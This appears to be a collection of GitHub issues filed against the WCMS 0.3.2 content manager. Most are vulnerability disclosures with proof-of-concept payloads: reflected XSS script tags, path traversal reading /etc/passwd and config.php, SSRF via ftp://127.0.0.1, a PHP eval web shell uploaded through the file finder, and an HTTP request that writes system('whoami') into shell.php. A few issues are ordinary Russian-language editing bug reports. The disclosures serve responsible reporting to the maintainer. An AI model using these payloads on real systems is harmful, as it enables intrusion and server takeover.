Hi, dev team!

There is Reflected XSS vulnerability in wcms/wcms/wex/cssjs.php file.

The vulnerable code is:

64: type='<?php echo $_GET['type'];?>'>

Example POC: Just send any js code in type parameter like: type=<script>alert()</script>

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.

To prevent xss use next manual: https://portswigger.net/web-security/cross-site-scripting/preventing.

Please let me know about any fixes, I would like to register CVE number.

A Arbitrary File Reading Vulnerability in wex/cssjs.php
There is a vulnerability that can read and modify any files to getshell.
Affected software:WCMS V0.3.2

poc:
use ../ to directory traversal vulnerability.
I can read config.php get admin account.
/wex/cssjs.php?path=..//wcms/config.php&type=css

I can still do it.

Now let's modify this file.

Click Save

success！

so I can modify php file to getshell.
That Access without login.

Source code:
wex/cssjs.php

We can see there are not filtering with '../' , that’s why make directory traversal vulnerability.

Hi, dev team!

There is Path Traversal vulnerability in wcms/wex/html.php file.

The vulnerable code is:

wcms/wex/core/classes/Pagename.php:16: $_SESSION['pagename'] = $_POST['pagename'];
wcms/wex/core/classes/Pagename.php:20: $GLOBALS['pagename'] = $_SESSION['pagename'];
wcms/wex/html.php:17: $html_from_template = htmlspecialchars(file_get_contents($GLOBALS['pagename']));
wcms/wex/html.php:51: :code='<?php echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);?>'

Example POC:

<?php

$pagename = "/etc/passwd";
$html_from_template = htmlspecialchars(file_get_contents($pagename));
echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);

?>

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files

To prevent vulnerability use next manual: https://portswigger.net/web-security/file-path-traversal (prevent section)

Please let me know about any fixes, I would like to register CVE number.

Здравствуйте, создал абзац с классом .wcms-text, появись возможность редактирования в разделе Текст. После редактирования, текст вставляется в самом начале документа, а в не абзаце.
[Hello, created a paragraph with the class .wcms-text, there is an editing opportunity in the Text section. After editing, the text is inserted at the very beginning of the document, not the paragraph.]

upd.
Если в настройках выбрать Показывать теги, то отредактированный текст вставляется в тегах абзаца и классом .wcms-text, но опять в начале документа. При последующем редактировании каждый раз создается новый абзац, а не редактируется существующие абзацы.
[If you choose To Show Tags in your settings, the edited text is inserted in paragraph tags and .wcms-text, but again at the beginning of the document. Subsequent editing creates a new paragraph each time, rather than editing existing paragraphs.]

Hi, dev team!

There is SSRF Vulnerability in wcms/wcms/wex/html.php file.

The vulnerable code is:

wcms/wex/core/classes/Pagename.php:16: $_SESSION['pagename'] = $_POST['pagename'];
wcms/wex/core/classes/Pagename.php:20: $GLOBALS['pagename'] = $_SESSION['pagename'];
wcms/wex/html.php:17: $html_from_template = htmlspecialchars(file_get_contents($GLOBALS['pagename']));

Example POC:

<?php

$pagename = "ftp://127.0.0.1:8000";
$html_from_template = htmlspecialchars(file_get_contents($pagename));
?>

Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back-end server of a vulnerable web application. It can help identify open ports, local network hosts and execute command on services (for example redis, by using gopher:// scheme)

To prevent vulnerability use next manual: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

Please let me know about any fixes, I would like to register CVE number.

Hi, dev team!

There is Path Traversal vulnerability in wcms/wcms/wex/cssjs.php file.

The vulnerable code is:

31: $path = $_GET['path'];
32: $html_from_template = htmlspecialchars(file_get_contents($path));
61: :code='<?php echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);?>'

Example POC:

<?php

$path = "/etc/passwd";
$html_from_template = htmlspecialchars(file_get_contents($path));
echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);

?>

A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files

To prevent vulnerability use next manual: https://portswigger.net/web-security/file-path-traversal (prevent section)

Please let me know about any fixes, I would like to register CVE number.

Hello maintainer(s),

I am a security researcher from the Institute of Application Security at TU Braunschweig, Germany. We discovered a (potential) security vulnerability in your project.

We would like to report this vulnerability to you in a responsible and ethical manner.
Therefore, we do not want to disclose any details of the vulnerability publicly until you have had a chance to review and fix it.

Could you please let us know your prefered way of receiving security reports?

You can contact us at [email protected] or by replying to this issue.

Thank you for your attention and cooperation.

Hi, dev team!

There is SSRF Vulnerability in wcms/wcms/wex/cssjs.php file.

The vulnerable code is:

31: $path = $_GET['path'];
32: $html_from_template = htmlspecialchars(file_get_contents($path));
61: :code='<?php echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);?>'

Example POC:

<?php

$path = "ftp://127.0.0.1:8000";
$html_from_template = htmlspecialchars(file_get_contents($path));
echo htmlentities(json_encode($html_from_template, JSON_HEX_QUOT), ENT_QUOTES);

?>

Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back-end server of a vulnerable web application. It can help identify open ports, local network hosts and execute command on services (for example redis, by using gopher:// scheme)

To prevent vulnerability use next manual: https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

Please let me know about any fixes, I would like to register CVE number.

A Arbitrary File Upload Vulnerability in wcms/wex/finder/action.php

Affected software:WCMS V0.3.2
Type of vulnerability: Arbitrary File Upload
Discovered by: Yu Yang

Use this upload feature in the developer/finder：

and we can upload arbitrary file in the web server,it allows attackers upload malicious code

POC(2.php):
<?php @eval($_POST[c]);?>

code：


i hope you can fix it

Буду писать на Русском.
Баг в версии 0.3.2
Если в комментариях и в заголовке одинаковые значения текста, то заменится текст в комментарии, но не в заголовке. Если в title есть такое же текст как в заголовке, заменит текст в заголовке см. пример файла в public в моем форке(https://github.com/cryptoprof/wcms/tree/feature/securityFix), можно скопировать в Ваш вариант реализации. Некорректно отрабатывает функция
str_replace_nth
Она проходит по всему тексту, в т.ч. по комментариям. По идее нужно будет добавить индексы для html элементов и по ним обновлять. Если будет время-присоединюсь и попробую сам доработать
И да, спасибо за труды по CMS)

Hi, dev team!

There is Reflected XSS vulnerability in wcms/wex/html.php file.

The vulnerable code is:

wcms/wex/core/classes/Pagename.php:16: $_SESSION['pagename'] = $_POST['pagename'];
wcms/wex/core/classes/Pagename.php:20: $GLOBALS['pagename'] = $_SESSION['pagename'];
wcms/wex/html.php:52: path='<?php echo $GLOBALS['pagename']; ?>'

Example POC: Just send any js code in pagename parameter like: pagename =<script>alert()</script>

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.

To prevent xss use next manual: https://portswigger.net/web-security/cross-site-scripting/preventing.

Please let me know about any fixes, I would like to register CVE number.

Hi, dev team! The code in this file is vulnerable: Arbitrary file write And execute the command through this file

Vulnerability discovery

Vulnerable code found on lines 20 to 23 in the /wcms/wex/html.php file

if (isset($_GET['finish'])) {
    $path = $_GET['finish'];
    file_put_contents($path, $_POST['textAreaCode']);

Since the finish variable of the GET request and the textAreaCode variable of the POST request are controllable, an attacker can use the file_put_contents function to write malicious code into a custom file

construct poc

Use controllable variables to write malicious code into the shell.php file in the current directory
The payload is as follows：

POST /wangmarket-master/wcms-0.3.2/wcms/wex/html.php?finish=shell.php HTTP/1.1
Host: 192.168.3.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=pdvblj8k9q6rin0oroe36m6s77
Upgrade-Insecure-Requests: 1
Content-Length: 36

textAreaCode=<?php system('whoami');?>

It can be seen that the write is successful

get shell

Access the written malicious file, find that the malicious code is successfully executed, and echo it out

Привет! Отличная идея цмски! Жаль что всё еще в бэте. Прощу помощи:

У меня в верстке, помимо тэга img, используется тэг picture с source/webp и img/jpg. В итоге цмс не может найти картинки, хотя один jpg в тэге picture на главной он нашел, но его дубль в формате .webp - нет.

Скриншоты прилагаю. Заранее благодарю!